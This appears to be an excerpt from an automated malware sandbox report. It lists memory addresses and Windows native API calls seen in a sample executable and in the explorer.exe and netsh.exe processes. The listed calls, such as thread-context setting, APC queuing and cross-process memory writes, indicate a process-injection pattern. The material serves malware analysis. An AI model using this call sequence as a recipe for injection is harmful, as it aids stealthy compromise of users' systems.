                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03D02AD0 NtReadFile,LdrInitializeThunk,8_2_03D02AD0
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03D02FE0 NtCreateFile,LdrInitializeThunk,8_2_03D02FE0
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03D02F30 NtCreateSection,LdrInitializeThunk,8_2_03D02F30
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03D02EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,8_2_03D02EA0
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03D02DD0 NtDelayExecution,LdrInitializeThunk,8_2_03D02DD0
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03D02DF0 NtQuerySystemInformation,LdrInitializeThunk,8_2_03D02DF0
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03D02D10 NtMapViewOfSection,LdrInitializeThunk,8_2_03D02D10
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03D02CA0 NtQueryInformationToken,LdrInitializeThunk,8_2_03D02CA0
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03D02C70 NtFreeVirtualMemory,LdrInitializeThunk,8_2_03D02C70
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03D02C60 NtCreateKey,LdrInitializeThunk,8_2_03D02C60
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03D035C0 NtCreateMutant,LdrInitializeThunk,8_2_03D035C0
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03D04340 NtSetContextThread,8_2_03D04340
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03D04650 NtSuspendThread,8_2_03D04650
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03D02BF0 NtAllocateVirtualMemory,8_2_03D02BF0
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03D02BE0 NtQueryValueKey,8_2_03D02BE0
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03D02B80 NtQueryInformationFile,8_2_03D02B80
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03D02BA0 NtEnumerateValueKey,8_2_03D02BA0
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03D02AF0 NtWriteFile,8_2_03D02AF0
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03D02AB0 NtWaitForSingleObject,8_2_03D02AB0
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03D02F90 NtProtectVirtualMemory,8_2_03D02F90
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03D02FB0 NtResumeThread,8_2_03D02FB0
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03D02FA0 NtQuerySection,8_2_03D02FA0
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03D02F60 NtCreateProcessEx,8_2_03D02F60
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03D02EE0 NtQueueApcThread,8_2_03D02EE0
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03D02E80 NtReadVirtualMemory,8_2_03D02E80
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03D02E30 NtWriteVirtualMemory,8_2_03D02E30
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03D02DB0 NtEnumerateKey,8_2_03D02DB0
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03D02D00 NtSetInformationFile,8_2_03D02D00
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03D02D30 NtUnmapViewOfSection,8_2_03D02D30
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03D02CC0 NtQueryVirtualMemory,8_2_03D02CC0
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03D02CF0 NtOpenProcess,8_2_03D02CF0
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03D02C00 NtQueryInformationProcess,8_2_03D02C00
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03D03090 NtSetValueKey,8_2_03D03090
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03D03010 NtOpenDirectoryObject,8_2_03D03010
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03D039B0 NtGetContextThread,8_2_03D039B0
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03D03D70 NtOpenThread,8_2_03D03D70
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03D03D10 NtOpenProcessToken,8_2_03D03D10
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_030CA360 NtCreateFile,8_2_030CA360
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_030CA410 NtReadFile,8_2_030CA410
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_030CA490 NtClose,8_2_030CA490
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_030CA40E NtReadFile,8_2_030CA40E
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03AD9BAF NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose,8_2_03AD9BAF
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03ADA036 NtQueryInformationProcess,NtSuspendThread,NtSetContextThread,RtlQueueApcWow64Thread,NtResumeThread,8_2_03ADA036
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03AD9BB2 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,8_2_03AD9BB2
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03ADA042 NtQueryInformationProcess,8_2_03ADA042
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 0_2_02F776880_2_02F77688
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 0_2_02F700400_2_02F70040
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 0_2_02F776780_2_02F77678
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 0_2_02F70A000_2_02F70A00
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 0_2_02F709F00_2_02F709F0
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 0_2_0502211C0_2_0502211C
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 0_2_050200400_2_05020040
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 0_2_050200060_2_05020006
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 0_2_055BA2300_2_055BA230
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 0_2_055BE4600_2_055BE460
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 0_2_055BA21F0_2_055BA21F
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 0_2_055B92C80_2_055B92C8
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 0_2_055B92B80_2_055B92B8
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 0_2_055BECD00_2_055BECD0
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 0_2_055BE8980_2_055BE898
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 0_2_0725D6B80_2_0725D6B8
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 0_2_072569B00_2_072569B0
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 0_2_072500370_2_07250037
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 0_2_0725E0680_2_0725E068
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 0_2_072500400_2_07250040
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 0_2_0725D0D00_2_0725D0D0
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 0_2_0729BC280_2_0729BC28
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 0_2_0729C0C80_2_0729C0C8
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 0_2_07296A000_2_07296A00
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 0_2_072900070_2_07290007
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 0_2_0729A8480_2_0729A848
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 0_2_072900400_2_07290040
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_004010306_2_00401030
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0041E8916_2_0041E891
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0041E1AF6_2_0041E1AF
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_004012086_2_00401208
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0041DBB66_2_0041DBB6
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_00402D876_2_00402D87
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_00402D906_2_00402D90
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_00409E5B6_2_00409E5B
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_00409E606_2_00409E60
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0041DED86_2_0041DED8
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0041DFDF6_2_0041DFDF
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0041D78F6_2_0041D78F
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_00402FB06_2_00402FB0
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011EA1186_2_011EA118
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011401006_2_01140100
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011D81586_2_011D8158
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_012041A26_2_012041A2
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_012101AA6_2_012101AA
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_012081CC6_2_012081CC
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011E20006_2_011E2000
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0120A3526_2_0120A352
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_012103E66_2_012103E6
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0115E3F06_2_0115E3F0
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011F02746_2_011F0274
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011D02C06_2_011D02C0
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011505356_2_01150535
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_012105916_2_01210591
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011F44206_2_011F4420
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_012024466_2_01202446
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011FE4F66_2_011FE4F6
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011747506_2_01174750
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011507706_2_01150770
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0114C7C06_2_0114C7C0
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0116C6E06_2_0116C6E0
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011669626_2_01166962
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0121A9A66_2_0121A9A6
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011529A06_2_011529A0
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011528406_2_01152840
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0115A8406_2_0115A840
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011368B86_2_011368B8
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0117E8F06_2_0117E8F0
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0120AB406_2_0120AB40
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01206BD76_2_01206BD7
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0114EA806_2_0114EA80
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011ECD1F6_2_011ECD1F
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0115AD006_2_0115AD00
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01168DBF6_2_01168DBF
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0114ADE06_2_0114ADE0
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01150C006_2_01150C00
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011F0CB56_2_011F0CB5
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01140CF26_2_01140CF2
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01170F306_2_01170F30
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011F2F306_2_011F2F30
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01192F286_2_01192F28
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011C4F406_2_011C4F40
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011CEFA06_2_011CEFA0
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01142FC86_2_01142FC8
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0115CFE06_2_0115CFE0
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0120EE266_2_0120EE26
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01150E596_2_01150E59
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01162E906_2_01162E90
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0120CE936_2_0120CE93
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0120EEDB6_2_0120EEDB
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0121B16B6_2_0121B16B
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0113F1726_2_0113F172
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0118516C6_2_0118516C
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0115B1B06_2_0115B1B0
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0120F0E06_2_0120F0E0
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_012070E96_2_012070E9
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011FF0CC6_2_011FF0CC
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011570C06_2_011570C0
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0120132D6_2_0120132D
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0113D34C6_2_0113D34C
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0119739A6_2_0119739A
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011552A06_2_011552A0
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0116B2C06_2_0116B2C0
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011F12ED6_2_011F12ED
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_012075716_2_01207571
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011ED5B06_2_011ED5B0
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_012195C36_2_012195C3
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0120F43F6_2_0120F43F
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011414606_2_01141460
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0120F7B06_2_0120F7B0
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011956306_2_01195630
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_012016CC6_2_012016CC
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011E59106_2_011E5910
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011599506_2_01159950
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0116B9506_2_0116B950
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011BD8006_2_011BD800
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011538E06_2_011538E0
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0120FB766_2_0120FB76
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0116FB806_2_0116FB80
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0118DBF96_2_0118DBF9
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011C5BF06_2_011C5BF0
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01207A466_2_01207A46
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0120FA496_2_0120FA49
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011C3A6C6_2_011C3A6C
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011EDAAC6_2_011EDAAC
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01195AA06_2_01195AA0
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011F1AA36_2_011F1AA3
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011FDAC66_2_011FDAC6
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01207D736_2_01207D73
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01153D406_2_01153D40
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01201D5A6_2_01201D5A
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0116FDC06_2_0116FDC0
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011C9C326_2_011C9C32
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0120FCF26_2_0120FCF2
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0120FF096_2_0120FF09
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01151F926_2_01151F92
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0120FFB16_2_0120FFB1
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01159EB06_2_01159EB0
                Source: C:\Windows\explorer.exeCode function: 7_2_0E4DA2327_2_0E4DA232
                Source: C:\Windows\explorer.exeCode function: 7_2_0E4D90367_2_0E4D9036
                Source: C:\Windows\explorer.exeCode function: 7_2_0E4D00827_2_0E4D0082
                Source: C:\Windows\explorer.exeCode function: 7_2_0E4D1D027_2_0E4D1D02
                Source: C:\Windows\explorer.exeCode function: 7_2_0E4D79127_2_0E4D7912
                Source: C:\Windows\explorer.exeCode function: 7_2_0E4D4B307_2_0E4D4B30
                Source: C:\Windows\explorer.exeCode function: 7_2_0E4D4B327_2_0E4D4B32
                Source: C:\Windows\explorer.exeCode function: 7_2_0E4DD5CD7_2_0E4DD5CD
                Source: C:\Windows\explorer.exeCode function: 7_2_106160367_2_10616036
                Source: C:\Windows\explorer.exeCode function: 7_2_1060D0827_2_1060D082
                Source: C:\Windows\explorer.exeCode function: 7_2_1060ED027_2_1060ED02
                Source: C:\Windows\explorer.exeCode function: 7_2_106149127_2_10614912
                Source: C:\Windows\explorer.exeCode function: 7_2_1061A5CD7_2_1061A5CD
                Source: C:\Windows\explorer.exeCode function: 7_2_106172327_2_10617232
                Source: C:\Windows\explorer.exeCode function: 7_2_10611B307_2_10611B30
                Source: C:\Windows\explorer.exeCode function: 7_2_10611B327_2_10611B32
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_01085EB08_2_01085EB0
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03CDE3F08_2_03CDE3F0
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03D903E68_2_03D903E6
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03D8A3528_2_03D8A352
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03D502C08_2_03D502C0
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03D702748_2_03D70274
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03D881CC8_2_03D881CC
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03D901AA8_2_03D901AA
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03D841A28_2_03D841A2
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03D581588_2_03D58158
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03CC01008_2_03CC0100
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03D6A1188_2_03D6A118
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03D620008_2_03D62000
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03CCC7C08_2_03CCC7C0
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03CF47508_2_03CF4750
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03CD07708_2_03CD0770
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03CEC6E08_2_03CEC6E0
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03D905918_2_03D90591
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03CD05358_2_03CD0535
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03D7E4F68_2_03D7E4F6
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03D824468_2_03D82446
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03D744208_2_03D74420
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03D86BD78_2_03D86BD7
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03D8AB408_2_03D8AB40
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03CCEA808_2_03CCEA80
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03CD29A08_2_03CD29A0
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03D9A9A68_2_03D9A9A6
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03CE69628_2_03CE6962
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03CFE8F08_2_03CFE8F0
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03CB68B88_2_03CB68B8
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03CD28408_2_03CD2840
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03CDA8408_2_03CDA840
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03CC2FC88_2_03CC2FC8
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03CDCFE08_2_03CDCFE0
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03D4EFA08_2_03D4EFA0
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03D44F408_2_03D44F40
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03D72F308_2_03D72F30
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03D12F288_2_03D12F28
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03CF0F308_2_03CF0F30
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03D8EEDB8_2_03D8EEDB
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03D8CE938_2_03D8CE93
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03CE2E908_2_03CE2E90
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03CD0E598_2_03CD0E59
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03D8EE268_2_03D8EE26
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03CCADE08_2_03CCADE0
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03CE8DBF8_2_03CE8DBF
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03D6CD1F8_2_03D6CD1F
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03CDAD008_2_03CDAD00
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03CC0CF28_2_03CC0CF2
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03D70CB58_2_03D70CB5
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03CD0C008_2_03CD0C00
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03D1739A8_2_03D1739A
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03CBD34C8_2_03CBD34C
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03D8132D8_2_03D8132D
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03CEB2C08_2_03CEB2C0
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03D712ED8_2_03D712ED
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03CD52A08_2_03CD52A0
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03CDB1B08_2_03CDB1B0
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03D9B16B8_2_03D9B16B
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03CBF1728_2_03CBF172
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03D0516C8_2_03D0516C
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03CD70C08_2_03CD70C0
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03D7F0CC8_2_03D7F0CC
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03D870E98_2_03D870E9
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03D8F0E08_2_03D8F0E0
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03D8F7B08_2_03D8F7B0
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03D816CC8_2_03D816CC
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03D156308_2_03D15630
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03D995C38_2_03D995C3
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03D6D5B08_2_03D6D5B0
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03D875718_2_03D87571
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03CC14608_2_03CC1460
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03D8F43F8_2_03D8F43F
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03D45BF08_2_03D45BF0
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03D0DBF98_2_03D0DBF9
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03CEFB808_2_03CEFB80
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03D8FB768_2_03D8FB76
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03D7DAC68_2_03D7DAC6
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03D15AA08_2_03D15AA0
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03D71AA38_2_03D71AA3
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03D6DAAC8_2_03D6DAAC
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03D8FA498_2_03D8FA49
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03D87A468_2_03D87A46
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03D43A6C8_2_03D43A6C
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03CD99508_2_03CD9950
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03CEB9508_2_03CEB950
